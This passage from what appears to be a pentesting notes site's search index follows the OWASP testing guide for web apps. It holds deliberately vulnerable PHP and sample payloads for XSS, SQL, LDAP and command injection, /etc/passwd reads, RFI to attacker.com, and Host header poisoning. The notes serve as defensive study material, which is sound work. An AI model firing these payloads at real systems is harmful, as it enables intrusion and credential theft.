                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-09"]},{"location":"OWASP/WSTG-INFO-10/","title":"Map Application architecture","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.10. Map Application architecture

ID Link to Hackinglife Link to OWASP Objectives 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Application: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs, Network and Security: Reverse proxy, IPS, WAF
• In blind testing, start with the assumption that there is a simple setup (a single server).
• Then question whether there is a firewall protecting the web server.
• Is it a stateful firewall or is it an access list filter on a router? Is it bypassable?
• Inspect response headers and try to identify typical firewall response headers.
• Reverse proxies might be in use, configured as an Intrusion Prevention System.
• An application-level firewall might be in use.
• Proxy caches may be in use.
• Is there a load balancer in place? F5 BIG-IP load balancers introduce some prefixed cookies (see the sketch after this list).
• Some application web servers include values in the response or rewrite URLs automatically to do session tracking.
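
For instance, a hedged check for the F5 cookie mentioned above (the exact cookie name depends on the pool configuration):

curl -s -I https://example.org | grep -i \"BIGipServer\"\n# A cookie such as BIGipServer<pool_name>=... suggests an F5 BIG-IP load balancer in front of the server\n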
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-10"]},{"location":"OWASP/WSTG-INPV-01/","title":"Testing for Reflected Cross Site Scripting","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

                            ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

Reflected\u00a0Cross-site Scripting (XSS) occurs when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

                            XSS Filter Evasion Cheat Sheet

                            ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#causes","title":"Causes","text":"

                            This vulnerable PHP code in a welcome page may lead to an XSS attack:

                            <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
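
With that code deployed, a single crafted link triggers the reflection; a sketch (welcome.php and the host are assumptions):

curl -G \"http://example.org/welcome.php\" --data-urlencode \"name=<script>alert(1)</script>\"\n# The response body contains: Welcome <script>alert(1)</script>\n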
                            ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#attack-techniques","title":"Attack techniques","text":"

                            Go to my XSS cheat sheet

                            ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-02/","title":"Testing for Stored Cross Site Scripting","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                            ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

Stored cross-site scripting is a vulnerability where an attacker is able to inject JavaScript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload into a webpage on a website without proper sanitization, the XSS payload injected into the webpage will be executed by the browser of anyone who visits that webpage.

                            ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#causes","title":"Causes","text":"

                            This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

<?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=@$_GET['name']?>\n
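
Against that code, the payload is stored on the first request and served to every later visitor of the admin view; a sketch (the host is an assumption):

# 1. Store the payload in newcomers.log\ncurl -G \"http://example.org/\" --data-urlencode \"name=<script>alert(1)</script>\"\n# 2. The stored payload is now echoed back unescaped\ncurl \"http://example.org/?admin=1\"\n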
                            ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#attack-techniques","title":"Attack techniques","text":"

                            Go to my XSS cheat sheet

                            ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-03/","title":"Testing for HTTP Verb Tampering","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.3. Testing for HTTP Verb Tampering

                            ID Link to Hackinglife Link to OWASP Description 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06

                            This content has been merged into:\u00a0Test HTTP Methods

                            ","tags":["web pentesting","WSTG-INPV-03"]},{"location":"OWASP/WSTG-INPV-04/","title":"Testing for HTTP Parameter Pollution","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.4. Testing for HTTP Parameter Pollution

                            ID Link to Hackinglife Link to OWASP Description 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP.","tags":["web pentesting","WSTG-INPV-04"]},{"location":"OWASP/WSTG-INPV-05/","title":"Testing for SQL Injection","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                            ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it.

                            SQL injection testing checks if it is possible to inject data into an application/site so that it executes a user-controlled SQL query in the database. Testers find a SQL injection vulnerability if the application uses user input to create SQL queries without proper input validation.
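
A minimal manual probe, assuming a hypothetical injectable id parameter: trigger an error with a stray quote, then compare the responses to a true and a false boolean condition:

# A SQL error suggests the quote broke out of the query\ncurl -s -G \"http://example.com/item.php\" --data-urlencode \"id=1'\"\n\n# Boolean-based check: differing responses suggest the input reaches a SQL query\ncurl -s -G \"http://example.com/item.php\" --data-urlencode \"id=1 AND 1=1\"\ncurl -s -G \"http://example.com/item.php\" --data-urlencode \"id=1 AND 1=2\"\n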

                            ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-05/#see-my-notes","title":"See my notes","text":"
                            • SQL injection: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
                            • NoSQL injection: What is it. Typical payloads.
                            • Manual attack.
                            ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-06/","title":"Testing for LDAP Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.6. Testing for LDAP Injection

                            ID Link to Hackinglife Link to OWASP Description 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection:","tags":["web pentesting","WSTG-INPV-06"]},{"location":"OWASP/WSTG-INPV-07/","title":"Testing for XML Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.7. Testing for XML Injection

                            ID Link to Hackinglife Link to OWASP Description 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities.","tags":["web pentesting","WSTG-INPV-07"]},{"location":"OWASP/WSTG-INPV-08/","title":"Testing for SSI Injection","text":"OWASP
OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.8. Testing for SSI Injection
ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (presence of the .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-08/#server-side-includes-ssi-injection","title":"Server-Side Includes (SSI) Injection","text":"

SSIs are directives present in web applications, used to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes the SSI directives before supplying the page to the user.

SSI can lead to Remote Command Execution (RCE); however, most web servers have the exec directive disabled by default.
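
A minimal probe sketch, assuming a hypothetical .shtml page that reflects a name parameter: inject an SSI directive and see whether the server evaluates it:

# If SSI is evaluated, the response contains the document name instead of the raw directive\ncurl -s -G \"http://example.com/page.shtml\" --data-urlencode 'name=<!--#echo var=\"DOCUMENT_NAME\" -->'\n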

                            ","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-09/","title":"Testing for XPath Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.9. Testing for XPath Injection

                            ID Link to Hackinglife Link to OWASP Description 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181","tags":["web pentesting","WSTG-INPV-09"]},{"location":"OWASP/WSTG-INPV-10/","title":"Testing for IMAP SMTP Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.10. Testing for IMAP SMTP Injection

                            ID Link to Hackinglife Link to OWASP Description 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts.","tags":["web pentesting","WSTG-INPV-10"]},{"location":"OWASP/WSTG-INPV-11/","title":"Testing for Code Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection

                            ID Link to Hackinglife Link to OWASP Description 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity.","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-11/#local-file-inclusion","title":"Local File Inclusion","text":"

                            See my notes on Local File Inclusion
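
Two hedged probe examples for the payloads listed in the description above, against a hypothetical page.php?file= parameter:

# Path traversal: look for /etc/passwd content in the response\ncurl -s \"http://example.com/page.php?file=../../../../etc/passwd\"\n\n# PHP wrapper: returns the source of index.php base64-encoded if the wrapper is allowed\ncurl -s \"http://example.com/page.php?file=php://filter/convert.base64-encode/resource=index.php\"\n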

                            ","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-12/","title":"Testing for command injection","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.12. Testing for Command Injection

                            ID Link to Hackinglife Link to OWASP Description 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:|

                            Command injection vulnerabilities in the context of web application penetration testing occur when an attacker can manipulate the input fields of a web application in a way that allows them to execute arbitrary operating system commands on the underlying server. This type of vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.

                            Causes:

                            • User Input Handling: Web applications often take user input through forms, query parameters, or other means.
                            • Lack of Input Sanitization: Insecurely coded applications may fail to properly validate, sanitize, or escape user inputs before using them in system commands.
                            • Injection Points: Attackers identify injection points, such as input fields or URL query parameters, where they can insert malicious commands.

                            Impact:

                            • Unauthorized Execution: Attackers can execute arbitrary commands with the privileges of the web server process. This can lead to unauthorized data access, code execution, or system compromise.
                            • Data Exfiltration: Attackers can exfiltrate sensitive data, such as database content, files, or system configurations.
• System Manipulation: Attackers may manipulate the server, install malware, or create backdoors for future access.
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#how-to-test","title":"How to Test","text":"

• Malicious Input: Attackers craft input that includes special characters, such as semicolons, pipes, backticks, and other shell metacharacters, to break out of the intended input context and inject their own commands.
• Command Execution: When the application processes the attacker's input, it constructs a shell command using the malicious input. The server, believing the command to be legitimate, executes it on the underlying operating system.
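
A minimal probe sketch reusing the illustrative Perl URL from the case study below: append a separator plus a harmless command and look for its output in the response:

# If the output of id appears, the parameter reaches a shell\ncurl -s -G \"http://sensitive/cgi-bin/userData.pl\" --data-urlencode \"doc=user1.txt;id\"\ncurl -s -G \"http://sensitive/cgi-bin/userData.pl\" --data-urlencode \"doc=user1.txt|id\"\n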

                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#case-study-perl","title":"Case Study: Perl","text":"

                            When viewing a file in a web application, the filename is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol | onto the end of the filename.

                            # Example URL before alteration\nhttp://sensitive/cgi-bin/userData.pl?doc=user1.txt \n\n# Example URL modified\nhttp://sensitive/cgi-bin/userData.pl?doc=/bin/ls|\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php-code-injection","title":"PHP code injection","text":"

                            PHP code injection vulnerabilities, also known as PHP code execution vulnerabilities, occur when an attacker can inject and execute arbitrary PHP code within a web application. These vulnerabilities are a serious security concern because they allow attackers to gain unauthorized access to the server, execute malicious actions, and potentially compromise the entire web application.

                            Malicious Input: Attackers craft input that includes PHP code snippets, often enclosed within PHP tags (<?php ... ?>) or backticks (`).

                            Code Execution: When the application processes the attacker's input, it includes the injected PHP code as part of a PHP script that is executed on the server.

                            This allows the attacker to run arbitrary PHP code in the context of the web application.

Command injection: appending a semicolon followed by an operating system command to the end of a URL for a .php page will execute the command. %3B is the URL-encoded semicolon.

                            # Directly injecting operating system commands:\nhttp://sensitive/something.php?dir=%3Bcat%20/etc/passwd\n\n########\n# Injecting PHP commands\n#########\n\n# Validating that the injection is possible\nhttp://example.com/page.php?message=test;phpinfo();\nhttp://example.com/page.php?id=1'];phpinfo();\n\n# Executing PHP commands\nhttp://example.com/page.php?message=test;system(cat%20/etc/passwd)\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#special-characters-for-command-injection","title":"Special characters for command injection","text":"

The following special characters can be used for command injection:

                            | ; & $ > < ' ! \n
# Command 2 executes regardless of whether command 1 succeeds; the output of command 1 is piped into command 2.\ncmd1|cmd2\n\n# Command 2 executes regardless of whether command 1 succeeds.\ncmd1;cmd2\n\n# Command 2 will only be executed if command 1 fails.\ncmd1||cmd2\n\n# Command 2 will only be executed if command 1 succeeds.\ncmd1&&cmd2\n\n# Command substitution: executes the command and substitutes its output. For example, echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)\n$(cmd)\n\n# Backticks also execute the enclosed command. For example, `whoami`\n`cmd`\n\n# Process substitution\n>(cmd) : >(ls) \n<(cmd) : <(ls)\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#code-review-dangerous-api","title":"Code Review Dangerous API","text":"

Be aware of the use of the following APIs, as they may introduce command injection risks.

                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#java","title":"Java","text":"
                            Runtime.exec()\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#cc","title":"C/C++","text":"
                            system \nexec \nShellExecute\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#python","title":"Python","text":"
exec\neval\nos.system\nos.popen\nsubprocess.Popen\nsubprocess.call\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php","title":"PHP","text":"
                            system\nshell_exec \nexec\nproc_open \neval\n
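
During code review, a recursive grep is a quick way to surface these sinks; a minimal sketch over a hypothetical src/ tree (adjust the pattern per language):

# Flag potentially dangerous calls in PHP code\ngrep -rnE 'system|shell_exec|exec|proc_open|eval' --include='*.php' src/\n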
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-13/","title":"Testing for Format String Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.13. Testing for Format String Injection

                            ID Link to Hackinglife Link to OWASP Description 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application.","tags":["web pentesting","WSTG-INPV-13"]},{"location":"OWASP/WSTG-INPV-14/","title":"Testing for Incubated Vulnerability","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.14. Testing for Incubated Vulnerability

                            ID Link to Hackinglife Link to OWASP Description 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible.","tags":["web pentesting","WSTG-INPV-14"]},{"location":"OWASP/WSTG-INPV-15/","title":"Testing for HTTP Splitting Smuggling","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.15. Testing for HTTP Splitting Smuggling

                            ID Link to Hackinglife Link to OWASP Description 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.","tags":["web pentesting","WSTG-INPV-15"]},{"location":"OWASP/WSTG-INPV-16/","title":"Testing for HTTP Incoming Requests","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.16. Testing for HTTP Incoming Requests

                            ID Link to Hackinglife Link to OWASP Description 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes of end user Browser proxy or client-side application.","tags":["web pentesting","WSTG-INPV-16"]},{"location":"OWASP/WSTG-INPV-17/","title":"Testing for Host Header Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.17. Testing for Host Header Injection

                            ID Link to Hackinglife Link to OWASP Description 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header.

                            The goal:

                            • Assess if the Host header is being parsed dynamically in the application.
                            • Bypass security controls that rely on the header.

                            Source: https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#supply-an-arbitrary-host-header","title":"Supply an arbitrary Host header","text":"

Some intercepting proxies derive the target IP address from the Host header directly, which makes this kind of testing all but impossible; any changes you make to the header would just cause the request to be sent to a completely different IP address. However, Burp Suite accurately maintains the separation between the Host header and the target IP address.

In Burp Suite, set the target to www.example.com. Then, send your request with a modified Host header:

                            GET / HTTP/1.1\nHost: www.attacker.com\n

                            The front-end server or load balancer that received your request may simply not know where to forward it, resulting in an \"Invalid Host header\" error of some kind. This is especially likely if your target is accessed via a CDN.
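
Outside Burp, curl can keep the same separation between the Host header and the target IP with --resolve; a minimal sketch assuming the target really resolves to the hypothetical 192.0.2.10:

# Pin the connection to the real server, then supply an arbitrary Host header\ncurl -s --resolve www.example.com:80:192.0.2.10 -H \"Host: www.attacker.com\" http://www.example.com/ -o /dev/null -w \"%{http_code}\\n\"\n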

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#inject-host-override-headers","title":"Inject host override headers","text":"","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#x-forwarded-host-header-bypass","title":"X-Forwarded Host Header Bypass","text":"
                            GET / HTTP/1.1\nHost: www.example.com\nX-Forwarded-Host: www.attacker.com\n

                            Potentially producing client-side output such as:

                            <link src=\"http://www.attacker.com/link\" />\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#more-headers-bypassing","title":"More headers bypassing","text":"

                            Although\u00a0X-Forwarded-Host\u00a0is the de facto standard for this behavior, you may come across other headers that serve a similar purpose, including:

                            • X-Host
                            • X-Forwarded-Server
                            • X-HTTP-Host-Override
                            • Forwarded

In Burp Suite, you can use Param Miner's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.
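
Without Burp, a simple loop over the candidate headers can reveal which ones are reflected; a hedged sketch (example.com and attacker.com are placeholders, and note that the standard Forwarded header normally uses host= syntax):

# Count reflections of the injected value for each candidate override header\nfor h in X-Forwarded-Host X-Host X-Forwarded-Server X-HTTP-Host-Override Forwarded; do\n  echo -n \"$h: \"\n  curl -s -H \"$h: attacker.com\" \"http://www.example.com/\" | grep -c 'attacker.com'\ndone\n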

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#injecting-multiple-host-headers","title":"Injecting multiple Host headers","text":"
                            GET / HTTP/1.1\nHost:\u00a0www.example.com\nHost: www.attacker.com\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#http_host-vs-server_name-routing","title":"HTTP_HOST vs. SERVER_NAME Routing","text":"

Test this by supplying an absolute URL in the request line that differs from the Host header:

                            POST https://example.com/passwordreset HTTP/1.1\nHost: www.evil.com\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#port-based-attack","title":"Port-based attack","text":"

Web servers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax:

POST /user/passwordreset HTTP/1.1\nHost: example.com:@attacker.net\n

This may result in a password reset link of the form http://example.com:@attacker.net/..., where everything before the @ is treated as credentials. When the victim clicks it, the browser sends the reset key to attacker.net before showing any suspicious-URL warning.

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#persistent-xss-via-host-header-injection","title":"Persistent XSS via Host header injection","text":"
GET /index.html HTTP/1.1\nHost: cow\"onerror='alert(1)'rel='stylesheet'\n

                            The response should show a poisoned <link> element:

                            <link href=\"http://cow\"onerror='alert(1)'rel='stylesheet'/\" rel=\"canonical\"/>\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#add-line-wrapping","title":"Add line wrapping","text":"

The website may block requests with multiple Host headers, but you may be able to bypass this validation by indenting one of them, as shown below. Some servers will interpret the indented header as a wrapped line and, therefore, treat it as part of the preceding header's value. Other servers will ignore the indented header altogether.

                            GET /example HTTP/1.1 \n    Host: attacker.com \nHost: example.com\n
                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#exploitation","title":"Exploitation","text":"

                            https://portswigger.net/web-security/host-header/exploiting

                            ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-18/","title":"Testing for Server-side Template Injection","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

                            ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit.

                            Server-side Template Injection in HackingLife

Web applications commonly use server-side templating technologies (Jinja2, Twig, FreeMarker, etc.) to generate dynamic HTML responses. Server-side Template Injection vulnerabilities (SSTI) occur when user input is embedded in a template in an unsafe manner and results in remote code execution on the server. Any feature that supports advanced user-supplied markup may be vulnerable to SSTI.
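
A common first detection step is to submit a template expression and see whether it is evaluated; a minimal sketch against a hypothetical name parameter:

# If the response contains 49, a {{ }} engine (e.g. Jinja2/Twig) evaluated the input\ncurl -s -G \"http://example.com/page\" --data-urlencode \"name={{7*7}}\"\n\n# Engines with ${ } syntax (e.g. FreeMarker) can be probed the same way\ncurl -s -G \"http://example.com/page\" --data-urlencode 'name=${7*7}'\n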

                            ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-18/#see-my-notes","title":"See my notes","text":"
                            • Server Side Template Injections: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
                            ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-19/","title":"Testing for Server-Side Request Forgery","text":"OWASP

OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

ID Link to Hackinglife Link to OWASP Description 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Assess the severity of the vulnerability.

                            ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-19/#see-my-notes","title":"See my notes","text":"
                            • Server Side Request Forgery SSRF: What is it. Payloads. Techniques. Dictionaries. Tools.
                            ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-20/","title":"Testing for Mass Assignment","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.20. Testing for Mass Assignment

                            ID Link to Hackinglife Link to OWASP Description 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["web pentesting","WSTG-INPV-20"]},{"location":"OWASP/WSTG-SESS-01/","title":"Testing for Session Management Schema","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.1. Testing for Session Management Schema

                            ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated.

                            Session management in web applications refers to the process of securely handling and maintaining user sessions. A session is a period of interaction between a user and a web application, typically beginning when a user logs in and ending when they log out or their session expires due to inactivity. During a session, the application needs to recognize and track the user, store their data, and manage their access to different parts of the application.

                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#components","title":"Components","text":"
                            • Session Identifier: A unique token (often a session ID) is assigned to each user's session. This token is used to associate subsequent requests from the user with their session data.
                            • Session Data: Information related to the user's session, such as authentication status, user preferences, and temporary data, is stored on the server.
                            • Session Cookies: Session cookies are small pieces of data stored on the user's browser that contain the session ID. They are used to maintain state between the client and server.
                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#what-is-session-used-for","title":"What is session used for","text":"
                            • User Authentication: Session management is critical for user authentication. After a user logs in, the session management system keeps track of their authenticated state, allowing them to access protected resources without repeatedly entering credentials.
                            • User State: Web applications often need to maintain state information about a user's activities. For example, in an e-commerce site, the session management system keeps track of the items in a user's shopping cart.
                            • Security: If proper session management is not implemented correctly, it can lead to vulnerabilities such as session fixation, session hijacking, and unauthorized access.
                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#session-management-testing","title":"Session Management Testing","text":"

                            Some typical vulnerabilities related to session management are:

                            • Session Fixation Testing: Test for session fixation vulnerabilities by attempting to set a known session ID (controlled by the tester) and then login with another account. Verify if the application accepts the predefined session ID and allows the attacker access to the target account.
                            • Session Hijacking Testing: Test for session hijacking vulnerabilities by trying to capture and reuse another user's session ID. Tools like Wireshark or Burp Suite can help intercept and analyze network traffic for session data.
                            • Session ID Brute-Force: Attempt to brute force session IDs to assess their complexity and the application's resistance to such attacks.
                            ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-02/","title":"Testing for Cookies Attributes","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.2. Testing for Cookies Attributes

                            ID Link to Hackinglife Link to OWASP Description 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict)","tags":["web pentesting","WSTG-SESS-02"]},{"location":"OWASP/WSTG-SESS-03/","title":"Testing for Session Fixation","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.3. Testing for Session Fixation

ID Link to Hackinglife Link to OWASP Description 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renews the cookie after a successful user authentication.

                            Session fixation is a web application security attack where an attacker sets or fixes a user's session identifier (session token) to a known value of the attacker's choice. Subsequently, the attacker tricks the victim into using this fixed session identifier to log in, thereby granting the attacker unauthorized access to the victim's session.

                            The attacker obtains a session token issued by the target web application. This can be done in several ways, such as:

                            • Predicting or guessing the session token: Some web applications generate session tokens that are easy to predict or lack sufficient randomness.
                            • Intercepting the session token: If the application doesn't use secure channels (e.g., HTTPS) to transmit session tokens, an attacker may intercept them as they travel over an insecure network, such as an open Wi-Fi hotspot.

                            With a session token in hand, the attacker sets or fixes the victim's session token to a known value that the attacker controls. This value could be one generated by the attacker or an existing valid session token.

                            The attacker lures the victim into using the fixed session token to log in to the web application. This can be accomplished through various means:

                            • Sending the victim a link that includes the fixed session token.
                            • Manipulating the victim into clicking on a specially crafted URL.
                            • Social engineering tactics to convince the victim to log in under specific circumstances.

                            Once the victim logs in with the fixed session token, the attacker can now hijack the victim's session. The web application recognizes the attacker as the legitimate user since the session token matches what is expected.
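
A minimal curl sketch of this check (the /login endpoint, credentials, and cookie jar file names are hypothetical): obtain a pre-authentication cookie, log in while presenting it, and compare the session identifiers:

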